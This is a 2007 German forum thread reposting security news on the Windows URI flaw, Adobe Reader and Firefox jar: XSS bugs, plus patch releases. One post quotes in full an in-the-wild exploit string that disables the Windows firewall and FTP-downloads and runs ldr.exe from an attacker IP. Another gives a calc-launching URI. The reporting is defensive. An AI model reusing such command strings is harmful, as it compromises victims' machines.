Autor Thema: Firefox ...  (Gelesen 16066 mal)

0 Mitglieder und 2 Gäste betrachten dieses Thema.

Offline SiLæncer

  • Cheff-Cubie
  • *****
  • Beiträge: 191383
  • Ohne Input kein Output
    • DVB-Cube
Inoffizieller Patch für Windows-URI-Problem
« Antwort #45 am: 16 Oktober, 2007, 12:54 »
Über zwei Monate sind vergangen, seit dem die kritische URI-Lücke in Windows bekannt wurde – Microsoft hat aber bislang immer noch keinen Patch bereitgestellt. Immer mehr Anwender greifen daher zur Selbsthilfe und versuchen ihre Systeme mit diversen Workarounds abzudichten. Das seltsame Verhalten von Windows XP mit installiertem Internet Explorer 7 kann dazu führen, dass das Öffnen einer Datei in einer Anwendung den Rechner mit Schad-Software infiziert. Die Entwickler von Firefox und Skype haben Vorkehrungen getroffen, dies zu verhindern, andere wie Adobe Reader, Outlook Express/2000, Miranda und mIRC sind nach wie vor anfällig.

Jetzt hat ein Hacker mit dem Pseudonym KJK::Hyperion sogar einen provisorischen und natürlich höchst inoffiziellen Patch veröffentlicht. Dieser klinkt sich in die Verarbeitung der anfälligen Windows-Funktion ShellExecute() ein und versucht, die Aufrufparameter vor der Bearbeitung durch Windows zu bereinigen. Doch selbst der Entwickler warnt: "Der aktuelle Patch ist nahezu ungetestet und wurde keinerlei Qualitätskontrolle unterzogen ..."

Es ist also nicht zu empfehlen, diesen Patch auf Produktionssystemen zu installieren. Immerhin stellt KJK::Hyperion seinen Workaround nicht nur als installationsfertige DLL-Bibliothek, sondern auch als Quelltext unter einer Open-Source-Lizenz zur Verfügung. Somit können andere diesen Code evaluieren und unter Umständen verbessern.

Wann Microsoft eine richtige Lösung für das Problem bereitstellt, steht nach wie vor in den Sternen. Über Monate hinweg hatten die Redmonder alle Nachfragen in diese Richtung abgewimmelt. Erst vor einer Woche, nachdem Secunia nachgewiesen hatte, dass auch Outlook Express/2000 als Einfallsvektor für Angriffe genutzt werden könnte, bestätigte Microsoft überhaupt die Existenz eines Problems in Windows XP. Der Fehler soll laut einem Blog-Eintrag des Microsoft Security Response Centers durch ein Update des Codes in ShellExecute() erfolgen. Doch der nächste reguläre Termin für ein solches Update wäre erst der Patchday Mitte November; und für ein Update außer der Reihe gibt es bislang keine Anzeichen.

http://spacebunny.xepher.net/hack/shellexecutefiasco/

Quelle : www.heise.de

Arbeits.- Testrechner :

Intel® Core™ i7-6700 (4 x 3.40 GHz / 4.00 GHz)
16 GB (2 x 8 GB) DDR4 SDRAM 2133 MHz
250 GB SSD Samsung 750 EVO / 1 TB HDD
ZOTAC Geforce GTX 1080TI AMPExtreme Core Edition 11GB GDDR5
MSI Z170A PC Mate Mainboard
DVD-Brenner Laufwerk
Microsoft Windows 10 Home 64Bit

TT S2 3200 ( BDA Treiber 5.0.1.8 ) + Terratec Cinergy 1200 C ( BDA Treiber 4.8.3.1.8 )

Offline SiLæncer

  • Cheff-Cubie
  • *****
  • Beiträge: 191383
  • Ohne Input kein Output
    • DVB-Cube
Heftiger Fehler im inoffiziellen URI-Patch
« Antwort #46 am: 18 Oktober, 2007, 17:30 »
Der Autor des "nahezu ungetesteten", inoffiziellen Patches für das URI-Problem in Windows XP mit IE7 hat selbst einen gravierenden Fehler entdeckt. Es sei nach seinen eigenen Worten ein "grauenhaftes Speicherleck"; ein Fehler für den er sich eigentlich in die Ecke stellen müsste und schämen, meint KJK::Hyperion in seinem Beitrag auf einer Sicherheits-Mailingliste. Er stellt zwar auf seinen Seiten eine aktualiserte Fassung der Bibliothek bereit, aber auch deren Installation ist nicht zu empfehlen. Wann jedoch ein offizieller Patch von Microsoft erscheint, steht immer noch in den Sternen.

Quelle : www.heise.de

Arbeits.- Testrechner :

Intel® Core™ i7-6700 (4 x 3.40 GHz / 4.00 GHz)
16 GB (2 x 8 GB) DDR4 SDRAM 2133 MHz
250 GB SSD Samsung 750 EVO / 1 TB HDD
ZOTAC Geforce GTX 1080TI AMPExtreme Core Edition 11GB GDDR5
MSI Z170A PC Mate Mainboard
DVD-Brenner Laufwerk
Microsoft Windows 10 Home 64Bit

TT S2 3200 ( BDA Treiber 5.0.1.8 ) + Terratec Cinergy 1200 C ( BDA Treiber 4.8.3.1.8 )

Offline SiLæncer

  • Cheff-Cubie
  • *****
  • Beiträge: 191383
  • Ohne Input kein Output
    • DVB-Cube
Adobe und Netscape patchen URI-Lücke
« Antwort #47 am: 23 Oktober, 2007, 11:15 »
Adobe hat wie angekündigt die Versionen 8.1.1 von Adobe Reader und Acrobat veröffentlicht, in denen der Umgang mit URIs beziehungsweise URLs in PDF-Dokumenten überarbeitet wurde. Durch das Öffnen manipulierter Dokumente ist es möglich, auf dem System installierte Anwendungen mit beliebigen Parametern zu starten. Ein Angreifer kann darüber die Kontrolle über einen Rechner erlangen, in dem ein Opfer etwa eine auf einem Webserver abgelegte oder per Mail erhaltene PDF-Datei öffnet. Dazu ist es nicht einmal nötig, dass der Anwender auf einen Link im Dokument klickt. Durch die Nutzung von ActionScript in PDF kann das Dokument bereits beim Laden die URL selbst aufrufen.

Ein Update für Adobe Reader 7.0.9 und Acrobat 7.0.9 soll zu einem späteren Zeitpunkt erscheinen. Anwender, die nicht auf die Versionen 8.1.1 wechseln können, empfiehlt Adobe, die Verarbeitung der mailto-URI in der Windows-Registry zu deaktivieren. Eine Anleitung dazu finden Betroffene in Adobes Fehlerbericht. Allerdings ist das Problem prinzipiell nicht auf mailto-URIs beschränkt, eine URL wie http:%xx../../../../../../../../../windows/system32/calc.exe".cmd kann den Taschenrechner ebenfalls starten.

Auch AOL hat nachgelegt und die Fassung 9.0.0.1 des Netscape-Webbrowsers freigegeben, in der neben zahlreichen anderen Lücke auch die URI-Problematik gelöst wurde. Damit ist der Netscape-Browser sicherheitsmäßig auf dem Stand der aktuellen Firefox-Version 2.0.0.8.

Von den bekannten verwundbaren Anwendungen bleibt bis dato nur der Instant Messenger Miranda verwundbar. Das für den November-Patchday geplante Update für Windows sollte allerdings auch dort und mit anderen Anwendungen das Problem entschärfen.

Quelle : www.heise.de

Arbeits.- Testrechner :

Intel® Core™ i7-6700 (4 x 3.40 GHz / 4.00 GHz)
16 GB (2 x 8 GB) DDR4 SDRAM 2133 MHz
250 GB SSD Samsung 750 EVO / 1 TB HDD
ZOTAC Geforce GTX 1080TI AMPExtreme Core Edition 11GB GDDR5
MSI Z170A PC Mate Mainboard
DVD-Brenner Laufwerk
Microsoft Windows 10 Home 64Bit

TT S2 3200 ( BDA Treiber 5.0.1.8 ) + Terratec Cinergy 1200 C ( BDA Treiber 4.8.3.1.8 )

Offline SiLæncer

  • Cheff-Cubie
  • *****
  • Beiträge: 191383
  • Ohne Input kein Output
    • DVB-Cube
URI-Lücke in Adobes Produkten wird aktiv ausgenutzt [Update]
« Antwort #48 am: 24 Oktober, 2007, 10:01 »
Berichten auf der Sicherheitsmailingliste Full Disclosure zufolge gibt es bereits aktive Angriffe auf Anwender mittels präparierter PDF-Dokumente. Dabei enthalten die per E-Mail verschickten Dokumente eine URL, die versucht, über die bekannte URI-Lücke Befehle auf dem System auszuführen. Dabei soll es sich um folgende Befehlsfolge handeln:

mailto:%/../../../../../../Windows/system32/cmd".exe"" /c /q \"@echo
off&netsh firewall set opmode mode=disable&echo o 81.95.146.130>1&echo
binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1&
start ldr.exe&\" \"&\" "nul.bat"


Hier wird zunächst die Firewall unter Windows XP SP2 deaktiviert und per FTP die Datei ldr.exe nachgeladen und gestartet. Was dann im Weiteren geschieht, ist den Berichten nicht zu entnehmen. Es ist anzunehmen, dass sich ein Schädling auf dem System einnistet. Um Opfer eines Angriffs zu werden, ist es nicht zwingend erforderlich, einen Link im Dokument anzuklicken. Durch die Unterstützung von ActionScript, einer an JavaScript angelehnten Skriptsprache, kann das Dokument im Reader oder Acrobat die URL ohne Zutun des Anwenders aufrufen und somit die Befehlskette starten.

Die bösartigen PDF-Dateien sollen unter anderem Namen wie BILL.pdf, INVOICE.pdf und STATEMENT.pdf tragen, während als Betreffzeilen INVOICE alacrity, STATEMET indigene und INVOICE depredate gesichtet worden sind. Adobe stellt seit Anfang der Woche das Update 8.1.1 für den Adobe Reader und Acrobat zur Verfügung, in der das URI-Problem behoben ist. Anwender sollten so schnell wie möglich auf die aktuelle Version wechseln. Für diejenigen, denen aus bestimmten Gründen kein Update möglich ist, empfiehlt Adobe, in der Registry die Verknüpfung der mailto-URI mit Adobe-Produkten zu lösen. Ein Anleitung dazu findet sich hier: Update available for vulnerability in versions 8.1 and earlier of Adobe Reader and Acrobat.

Update
Derzeit ist die Windows-Version des Adobe Reader 8.1.1 noch nicht in deutsch verfügbar. Interressanterweise ist bereits für Linux ein RPM-Paket der deutschen Version 8.1.1 herunterladbar – allerdings kommt dort das URI-Problem gar nicht zum Tragen.

Quelle und Links : http://www.heise.de/newsticker/meldung/97866
« Letzte Änderung: 24 Oktober, 2007, 10:16 von SiLæncer »

Arbeits.- Testrechner :

Intel® Core™ i7-6700 (4 x 3.40 GHz / 4.00 GHz)
16 GB (2 x 8 GB) DDR4 SDRAM 2133 MHz
250 GB SSD Samsung 750 EVO / 1 TB HDD
ZOTAC Geforce GTX 1080TI AMPExtreme Core Edition 11GB GDDR5
MSI Z170A PC Mate Mainboard
DVD-Brenner Laufwerk
Microsoft Windows 10 Home 64Bit

TT S2 3200 ( BDA Treiber 5.0.1.8 ) + Terratec Cinergy 1200 C ( BDA Treiber 4.8.3.1.8 )

Offline berti

  • User a.D.
  • ****
  • Beiträge: 1005
  • permanent offline
Re: URI-Lücke in Adobes Produkten wird aktiv ausgenutzt [Update]
« Antwort #49 am: 24 Oktober, 2007, 10:31 »
[...]
Hier wird zunächst die Firewall unter Windows XP SP2 deaktiviert und per FTP die Datei ldr.exe nachgeladen und gestartet.
[...] Durch die Unterstützung von ActionScript, einer an JavaScript angelehnten Skriptsprache, kann das Dokument im Reader oder Acrobat die URL ohne Zutun des Anwenders aufrufen und somit die Befehlskette starten.


Kleine verständnissfrage: wenn ich eine andere Firewall (kasper) benutze und die Java unterstützung im Adope-reader disable, bin ich dann gegen dieses problem gefeit ?
Born 4.1960  KIA 2.2012

Offline SiLæncer

  • Cheff-Cubie
  • *****
  • Beiträge: 191383
  • Ohne Input kein Output
    • DVB-Cube
Re: URI-Lücke in Adobes Produkten wird aktiv ausgenutzt [Update]
« Antwort #50 am: 24 Oktober, 2007, 10:33 »
Könnte klappen ...

btw. es gibt ja auch gute Alternativen zum Acrobat Reader ;)

das z.B. : http://download.winboard.org/details.php?file=128
« Letzte Änderung: 24 Oktober, 2007, 10:40 von SiLæncer »

Arbeits.- Testrechner :

Intel® Core™ i7-6700 (4 x 3.40 GHz / 4.00 GHz)
16 GB (2 x 8 GB) DDR4 SDRAM 2133 MHz
250 GB SSD Samsung 750 EVO / 1 TB HDD
ZOTAC Geforce GTX 1080TI AMPExtreme Core Edition 11GB GDDR5
MSI Z170A PC Mate Mainboard
DVD-Brenner Laufwerk
Microsoft Windows 10 Home 64Bit

TT S2 3200 ( BDA Treiber 5.0.1.8 ) + Terratec Cinergy 1200 C ( BDA Treiber 4.8.3.1.8 )

Offline berti

  • User a.D.
  • ****
  • Beiträge: 1005
  • permanent offline
Re: URI-Lücke in Adobes Produkten wird aktiv ausgenutzt [Update]
« Antwort #51 am: 24 Oktober, 2007, 10:38 »
Danke.

Werde das mal auf dem honeypot-rechner ausprobieren, sobald solche mail eintrifft.

ergebniss geb ich dann bekannt.
Born 4.1960  KIA 2.2012

Offline Jürgen

  • der Löter
  • User a.D.
  • ****
  • Beiträge: 4999
  • white LED trough prism - WTF is cyan?
Re: Firefox 2.0.0.5 beseitigt Sicherheitslücken [Update]
« Antwort #52 am: 24 Oktober, 2007, 13:05 »
Der Foxit PDF Reader ist sicher noch kein vollwertiger Ersatz für den von Adobe, aber hier nutze ich den schon lange als Default-Anwendung.
Den anderen habe ich in's Send To Kontextmenü eingebaut.

Hinzu kommt, dass ich für's DSL-Modem (wie für jede andere Komponente auch) einen extra Netzschalter habe. Das läuft nur, wenn ich's für sinnvoll halte, den Rest der Zeit spare ich mir auch den Strom.

Browser-Plugins für PDF lehne ich ab.
Default wird nicht geöffnet sondern gespeichert.

Damit fällt Nachladen flach.
Kein Support per persönlicher Mitteilung!
Fragen gehören in's Forum.

Veränderungen stehen an. Dies ist der bisherige Stand:
28,x°,23.5°,19,2°,13°Ost
,1mØ Multifeed, mit Quattro LNBs; Multiswitches 4x 5/10(+x) - alle ohne Terrestrik und modifiziert für nur ein 12V DC Steckernetzteil (Verbrauch insgesamt 15 Watt)
1mØ mit DiSEqC 1.3/USALS als LNB2 an DVB-S2 STB, aktuell 30°W bis 55°O
1.) FM2A88X Extreme6+, A8-6600K (APU mit 4x 3,9 GHz und Radeon HD8570D), 16GB DDR3 1866, 128GB SSD, 3TB HDD, Win10 x64 Pro 1909 / 10.0.17763.107, Terratec T-Stick Plus (für DAB+), Idle Verbrauch ca. 35 Watt
2.) FM2A75 Pro 4, A8-5600K (APU mit 4x 3,6 GHz und Radeon HD7530D), 8GB DDR3 1600, 128GB SSD, 2TB HDD, Win10 x64 Pro, Idle Verbrauch ca. 45 Watt
3.) Raspberry Pi 512MB u.a. mit Raspbian
4.) GA-MA770-UD3, Phenom II x4 940, 8GB DDR2, Radeon HD6570, 2TiB, USB 3.0, 10 Pro x64 (+ XP Pro 32bit (nur noch offline)), Ubuntu 10.4 64bit, Cinergy S2 USB HD, NOXON DAB+ Stick, MovieBox Plus USB, ...

Samsung LE32B530 + Benq G2412HD @ HDMI 4:2; Tokaï LTL-2202B
XORO HRS-9200 CI+ (DVB-S2); XORO HRT-8720 (DVB-T2 HD)
Empfänger nur für FTA genutzt / ohne Abos
YAMAHA RX-V663 (AV-Receiver); marantz 7MKII; Philips SHP2700 ...
FritzBox 7590 mit VDSL2 50000

Offline berti

  • User a.D.
  • ****
  • Beiträge: 1005
  • permanent offline
Re: Firefox 2.0.0.5 beseitigt Sicherheitslücken [Update]
« Antwort #53 am: 24 Oktober, 2007, 13:12 »
foxit benutz ich z.teil auch, aber speziell bei arabisch & Persisch macht das teil ab und an probleme.
von daher leider adobe und die 8er version will ich mir nicht antun, die ruft mir zu oft nach hause an. >:(
Born 4.1960  KIA 2.2012

Offline SiLæncer

  • Cheff-Cubie
  • *****
  • Beiträge: 191383
  • Ohne Input kein Output
    • DVB-Cube
Cross-Site-Scripting-Lücke in Firefox
« Antwort #54 am: 09 November, 2007, 11:56 »
Eine Schwachstelle in Firefox lässt sich für Cross-Site-Scripting-Attacken ausnutzen, durch die ein Angreifer etwa Anmeldeinformationen eines Opfers auf Webseiten wie MySpace und ähnlichen Angeboten abgreifen kann. Das Problem ist zwar bereits seit Anfang dieses Jahres bei den Firefox-Entwicklern bekannt und auch in einem Bugzilla-Eintrag dokumentiert, bislang hat man aber noch keine Änderung in Firefox vorgenommen, um es aus der Welt zu schaffen. Der Sicherheitsspezialist Petko Petkof ist nun offenbar abermals über den Fehler gestolpert und hat ihn in seinem Blog veröffentlich, sodass nun bereits das US-CERT einen Fehlerbericht dazu herausgegeben hat.

Die Schwachstelle beruht auf der Implementierung des von Sun spezifizierten jar-Protokolls, mit dem der Zugriff auf einzelne Dateien innerhalb eines Java-Archivs von einer Webseite möglich ist:
jar:http://www.foo.com/bar/baz.jar!/COM/foo/Quux.class
Dabei beschreibt http://www.foo.com/bar/baz.jar den Weg zum Archiv und !/COM/foo/Quux.class den Pfad zur Datei.

Da es sich bei dem Archiv nur um eine ZIP-Datei handelt und das Protokoll nicht nur auf Java-Dateien beschränkt ist, lassen sich auch andere Dateien auf diese Weise aufrufen:
jar:https://example.com/test.jar!/t.htm.
Dabei wird t.htm im Browser im Kontext von example.com dargestellt, was an sich nicht schlimm wäre, da das Dokument ja auch von dort stammt. Unglücklicherweise lassen sich damit aber etwa wie auf MySpace betriebene JavaScript-Filter austricksen, da diese nur die Inhalte der Seiten prüfen, nicht jedoch hochgeladene Dateien und Archive. Zudem funktioniert es ebenfalls, wenn man etwa test.zip in test.png umbenennt, um der Datei den Anschein eines Bildes zu geben. Der Trick funktioniert auch mit anderen Formaten, die im Wesentlichen nur ein komprimiertes Archiv darstellen, beispielsweise das Doc-Format unter OpenOffice.

Angreifer könnten mit einer präparierten URL etwa Eingaben auf anderen Seiten auslesen. Für einen erfolgreichen Angriff muss ein Phisher aber eine präparierte komprimierte Datei auf einem Server hinterlegen und sein Opfer dazu bringen, einen Link dorthin anzuklicken. Allerdings bleibt der mehr oder minder kryptische Link in der Adresszeile des Browser bei einem Angriff stehen.

Grundsätzlich hilft es, wie auch gegen die meisten anderen Cross-Site-Scripting-Angriffe, das Firefox-Modul NoScript eimzusetzen. Darüber hinaus empfiehlt das US-CERT Administratoren von Unternehmensnetzen, jar-URIs am Proxy oder der Firewall zu blockieren. Zudem können Betreiber von Webservern den Missbrauch ihrer Seiten verhindern, indem sie mit einem Reverse-Proxy URLs mit jar blockieren. Auch das Filtern der MIME-Typen, um die wirklich übertragenen Inhalte zu erkennen, soll helfen.

Siehe dazu auch:

    * Web Mayhem: Firefox’s JAR: Protocol issues, Bericht von pdp
    * Mozilla Firefox jar URI cross-site scripting vulnerability, Fehlerbericht des US-CERT
    * jar: protocol is an XSS hazard due to ignoring mime type and being considered same-origin with hosting site, Bugzilla-Eintrag von Mozilla.org

Quelle und Links : http://www.heise.de/security/news/meldung/98721/Cross-Site-Scripting-Luecke-in-Firefox

Arbeits.- Testrechner :

Intel® Core™ i7-6700 (4 x 3.40 GHz / 4.00 GHz)
16 GB (2 x 8 GB) DDR4 SDRAM 2133 MHz
250 GB SSD Samsung 750 EVO / 1 TB HDD
ZOTAC Geforce GTX 1080TI AMPExtreme Core Edition 11GB GDDR5
MSI Z170A PC Mate Mainboard
DVD-Brenner Laufwerk
Microsoft Windows 10 Home 64Bit

TT S2 3200 ( BDA Treiber 5.0.1.8 ) + Terratec Cinergy 1200 C ( BDA Treiber 4.8.3.1.8 )

Offline SiLæncer

  • Cheff-Cubie
  • *****
  • Beiträge: 191383
  • Ohne Input kein Output
    • DVB-Cube
Mozilla-Foundation will XSS-Lücke in Firefox schließen
« Antwort #55 am: 20 November, 2007, 15:29 »
Die kürzlich öffentlich bekannt gewordene Firefox-Schwachstelle in der Implementierung des jar-Protokolls weist offenbar noch mehr Potenzial für Missbrauch auf als vermutet. Die Lücke ermöglicht Angreifern, bestimmte Schutzvorkehrungen respektive Filter von Webseiten wie MySpace und anderen gegen Cross-Site-Scripting und aktive Inhalte auszutricksen, um Anwendern Login-Informationen abzuluchsen. Bislang ging man davon aus, dass es dafür möglich sein muss, ZIP- und andere Archive mit präparierten Inhalten auf dem vom Opfer besuchten Webserver zu zu speichern.

Nach Angaben der Entwickler soll der Angriff aber auch mit Redirects funktionieren, sodass ein präpariertes Archiv auf einem beliebigen Server liegen darf. Um das Archiv aufzurufen, genügt es, einfach den Redirect im HTML-Code einzubetten oder eine Seite wie Google-Mail zu nutzen, die Redirects unterstützt. Ein Demonstrationsexploit der Firefox-Entwickler führt das Problem für Google-Mail-Konten vorf. Im Test der heise-Security-Redaktion las er die gespeicherten Kontakte aus. Die Entwickler planen, das Problem in Firefox 2.0.0.10 zu lösen, indem der Browser prüft, ob der MIME-Type des Archivs korrekt ist. Version 2.0.0.10 unterliegt derzeit noch diversen Tests.

Quelle : www.heise.de

Arbeits.- Testrechner :

Intel® Core™ i7-6700 (4 x 3.40 GHz / 4.00 GHz)
16 GB (2 x 8 GB) DDR4 SDRAM 2133 MHz
250 GB SSD Samsung 750 EVO / 1 TB HDD
ZOTAC Geforce GTX 1080TI AMPExtreme Core Edition 11GB GDDR5
MSI Z170A PC Mate Mainboard
DVD-Brenner Laufwerk
Microsoft Windows 10 Home 64Bit

TT S2 3200 ( BDA Treiber 5.0.1.8 ) + Terratec Cinergy 1200 C ( BDA Treiber 4.8.3.1.8 )

Offline SiLæncer

  • Cheff-Cubie
  • *****
  • Beiträge: 191383
  • Ohne Input kein Output
    • DVB-Cube
Sicherheitsupdate für Webbrowser Firefox
« Antwort #56 am: 27 November, 2007, 11:04 »
Wie bereits vor einigen Tagen versprochen, haben die Mozilla-Entwickler ein neues Sicherheitsupdate für den Open-Source-Webbrowser Firefox vorgelegt. Die Version 2.0.0.10 schließt insgesamt drei Sicherheitslücken, die seit dem letzten Update bekannt wurden. Zu den Fehlern, die behoben wurden, gehört die Schwachstelle in der Implementierung des jar-Protokolls; dies ermöglichte Angreifern, bestimmte Schutzvorkehrungen respektive Filter von Webseiten wie MySpace und anderen gegen Cross-Site-Scripting und aktive Inhalte auszutricksen, um Anwendern Login-Informationen abzuluchsen.

Die Bedeutung aller Sicherheitslücken (neben dem jar-Problem ein Bug, der Referer-Spoofing ermöglichte, und Fehler, die möglicherweise über Abstürze zu Code-Einschleusung genutzt werden konnten) schätzt die Mozilla-Foundation als "Hoch" ein. Anwender von Firefox sollten so schnell wie möglich auf die neue Version updaten. Firefox 2.0.0.10 steht für Windows, Mac OS X und Linux in diversen Landessprachen, darunter Deutsch, zum Download bereit. Nach und nach wird die neue Version auch allen Anwendern über die automatische Update-Funktion des Browsers angeboten.

Quelle : www.heise.de

Arbeits.- Testrechner :

Intel® Core™ i7-6700 (4 x 3.40 GHz / 4.00 GHz)
16 GB (2 x 8 GB) DDR4 SDRAM 2133 MHz
250 GB SSD Samsung 750 EVO / 1 TB HDD
ZOTAC Geforce GTX 1080TI AMPExtreme Core Edition 11GB GDDR5
MSI Z170A PC Mate Mainboard
DVD-Brenner Laufwerk
Microsoft Windows 10 Home 64Bit

TT S2 3200 ( BDA Treiber 5.0.1.8 ) + Terratec Cinergy 1200 C ( BDA Treiber 4.8.3.1.8 )

Offline SiLæncer

  • Cheff-Cubie
  • *****
  • Beiträge: 191383
  • Ohne Input kein Output
    • DVB-Cube
Erneuter Ärger mit Firefox-Update
« Antwort #57 am: 27 November, 2007, 12:19 »
Wenig Glück hat derzeit die Mozilla-Stiftung mit ihren neuen Firefox-Versionen. Die eben erst veröffentlichte Version 2.0.0.10, die drei Sicherheitslücken schließt, enthält einen neuen Fehler: Der Browser kann jetzt bestimmte Grafiken nicht mehr anzeigen.

Firefox 2.0.0.10 reagiert auf die JavaScript-Methode canvas.drawImage() mit der Ausnahme "NS_ERROR_NOT_AVAILABLE". Das Canvas-Objekt, ein seit Firefox 1.5 unterstützter Bestandteil von (X)HTML5, ermöglicht Vektorgrafiken per HTML und JavaScript; die jetzt fehlerhafte drawImage()-Methode zeichnet Pixelbilder in die Vektorgrafiken.

Schon die vorletzte Firefox-Version 2.0.0.8 hatte neben Sicherheits-Updates eine ganze Reihe von alten Fehler erneut in den Browser eingeschleust. Nach knapp zwei Wochen hatte Mozilla die Probleme beseitigt.

Quelle : www.heise.de

Arbeits.- Testrechner :

Intel® Core™ i7-6700 (4 x 3.40 GHz / 4.00 GHz)
16 GB (2 x 8 GB) DDR4 SDRAM 2133 MHz
250 GB SSD Samsung 750 EVO / 1 TB HDD
ZOTAC Geforce GTX 1080TI AMPExtreme Core Edition 11GB GDDR5
MSI Z170A PC Mate Mainboard
DVD-Brenner Laufwerk
Microsoft Windows 10 Home 64Bit

TT S2 3200 ( BDA Treiber 5.0.1.8 ) + Terratec Cinergy 1200 C ( BDA Treiber 4.8.3.1.8 )

Offline SiLæncer

  • Cheff-Cubie
  • *****
  • Beiträge: 191383
  • Ohne Input kein Output
    • DVB-Cube
Firefox 2.0.0.11 - Neue Version bereits im Anmarsch
« Antwort #58 am: 29 November, 2007, 16:22 »
Dem in dieser Woche veröffentlichten Firefox 2.0.0.10 wird bereits in Kürze die Version 2.0.0.11 folgen. Diese Version ist notwendig geworden, nachdem sich in Firefox 2.0.0.10 ein schwerer Bug eingeschlichen hatte, der bisher in keiner Firefox-Version existierte.

Derzeit scheinen die Firefox-Entwickler etwas vom Pech verfolgt zu sein: Nachdem erst in dieser Woche Firefox 2.0.0.10 erschienen war, soll bereits in Kürze Firefox 2.0.0.11 folgen - seit Mitte Oktober die vierte neue Version des Browsers.

Was ist geschehen: Bereits kurz nach Veröffentlichung von Firefox 2.0.0.10 gingen Klagen darüber ein, dass eine bisher tadellos arbeitende Funktion bei der neuen Firefox-Version nicht mehr funktionierte. „canvas.drawImage“ verweigert in Firefox 2.0.0.10 seine Dienste. Der Fehler ist in diesem Bugzilla-Eintrag dokumentiert.

Diese Website belegt den Fehler. Eigentlich sollte auf dieser Seite oben rechts ein Bild dargestellt werden. Ruft man die Fehler-Konsole von Firefox auf (unter Extras), wird eine Fehlermeldung angezeigt. Weitere Seiten, die aufgrund des Fehlers nicht mehr funktionieren, werden im Bugzilla-Eintrag aufgelistet. Getroffen hat es auch Online-Shops, die die besagte Funktion für die Darstellung von Grafiken nutzen und seither nicht mehr von Firefox-Nutzern genutzt werden können, nach dem sich bei diesen automatisch die neue Version 2.0.0.10 installiert hat.

Der Bug in Firefox 2.0.0.10 ist bereits behoben worden. Derzeit befinden sich Vorabfassungen von Firefox 2.0.0.11 im Test-Stadium. Die Release-Candidates von Firefox 2.0.0.11 in diversen Sprachen und für Windows, Linux und MacOS X sind in diesem FTP-Verzeichnis bei Mozilla abgelegt.
Die finale Version von 2.0.0.11 könnte noch im November erscheinen. Gemunkelt wird, dass es bereits am Freitag, den 30. November, so weit sein könnte.

Quelle : www.pcwelt.de

Arbeits.- Testrechner :

Intel® Core™ i7-6700 (4 x 3.40 GHz / 4.00 GHz)
16 GB (2 x 8 GB) DDR4 SDRAM 2133 MHz
250 GB SSD Samsung 750 EVO / 1 TB HDD
ZOTAC Geforce GTX 1080TI AMPExtreme Core Edition 11GB GDDR5
MSI Z170A PC Mate Mainboard
DVD-Brenner Laufwerk
Microsoft Windows 10 Home 64Bit

TT S2 3200 ( BDA Treiber 5.0.1.8 ) + Terratec Cinergy 1200 C ( BDA Treiber 4.8.3.1.8 )

Offline Jürgen

  • der Löter
  • User a.D.
  • ****
  • Beiträge: 4999
  • white LED trough prism - WTF is cyan?
Firefox 2.0.0.11 - Neue Version ist verfügbar
« Antwort #59 am: 01 Dezember, 2007, 01:36 »
Die angekündigte Firefox-Version 2.0.0.11 ist jetzt verfügbar, auf Deutsch und auch bereits als Update, manuell wie automatisch.
Kein Support per persönlicher Mitteilung!
Fragen gehören in's Forum.

Veränderungen stehen an. Dies ist der bisherige Stand:
28,x°,23.5°,19,2°,13°Ost
,1mØ Multifeed, mit Quattro LNBs; Multiswitches 4x 5/10(+x) - alle ohne Terrestrik und modifiziert für nur ein 12V DC Steckernetzteil (Verbrauch insgesamt 15 Watt)
1mØ mit DiSEqC 1.3/USALS als LNB2 an DVB-S2 STB, aktuell 30°W bis 55°O
1.) FM2A88X Extreme6+, A8-6600K (APU mit 4x 3,9 GHz und Radeon HD8570D), 16GB DDR3 1866, 128GB SSD, 3TB HDD, Win10 x64 Pro 1909 / 10.0.17763.107, Terratec T-Stick Plus (für DAB+), Idle Verbrauch ca. 35 Watt
2.) FM2A75 Pro 4, A8-5600K (APU mit 4x 3,6 GHz und Radeon HD7530D), 8GB DDR3 1600, 128GB SSD, 2TB HDD, Win10 x64 Pro, Idle Verbrauch ca. 45 Watt
3.) Raspberry Pi 512MB u.a. mit Raspbian
4.) GA-MA770-UD3, Phenom II x4 940, 8GB DDR2, Radeon HD6570, 2TiB, USB 3.0, 10 Pro x64 (+ XP Pro 32bit (nur noch offline)), Ubuntu 10.4 64bit, Cinergy S2 USB HD, NOXON DAB+ Stick, MovieBox Plus USB, ...

Samsung LE32B530 + Benq G2412HD @ HDMI 4:2; Tokaï LTL-2202B
XORO HRS-9200 CI+ (DVB-S2); XORO HRT-8720 (DVB-T2 HD)
Empfänger nur für FTA genutzt / ohne Abos
YAMAHA RX-V663 (AV-Receiver); marantz 7MKII; Philips SHP2700 ...
FritzBox 7590 mit VDSL2 50000